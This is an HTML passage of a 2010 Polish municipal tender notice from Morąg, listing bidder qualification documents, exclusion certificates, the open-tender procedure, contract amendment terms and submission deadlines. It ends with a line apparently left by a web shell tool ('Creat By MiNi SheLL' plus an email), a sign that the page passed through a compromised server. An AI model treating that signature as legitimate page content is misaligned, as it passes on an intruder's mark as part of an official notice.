<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o zgodności z warunkami przetargu
2. Zobowiązanie do wniesienia zabezpieczenia
3. Dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
a)	Zmiany kwoty wynagrodzenia:
- w przypadku zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, w tym zwłaszcza w zakresie stawki podatku VAT,
-  w przypadku wystąpienia robót uzupełniających, dodatkowych lub zamiennych / koszty tych robót przyjmowane będą na podstawie kosztorysów sporządzonych wg ustalonych składników cenotwórczych zawartych w formularzu ofertowym Wykonawcy/,
- w przypadku wykonania mniejszego zakresu robót niż określony w dokumentacji technicznej proporcjonalnie do zakresu rzeczowego.
b)	Zmiany terminu wykonania przedmiotu zamówienia:
- w przypadku zlecenia wykonania robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego,
- w przypadku wystąpienia anomalii pogodowych lub innych nieprzewidywalnych przyczyno charakterze obiektywnym, mających znaczny wpływ na termin wykonania,
- w związku ze stwierdzeniem braków lub błędów projektowych o czas niezbędny na poprawienie lub uzupełnienie projektu,
- w przypadku udzielenia zamówień uzupełniających przewidzianych w SIWZ pkt 4.1 jeżeli terminy ich zlecenia uniemożliwiają dotrzymanie pierwotnego terminu umownego,
Okres wydłużenia terminu zakończenia powinien odpowiadać okresom opóźnień wymienionych powyżej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.morag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu
14-300 Morąg
ul. 11 Listopada 9
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 09:00, miejsce: Urząd Miejski w Morągu
14-300 Morąg
ul. 11 Listopada 9
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja planowana do realizacji w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, działanie 313,322,323 - Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com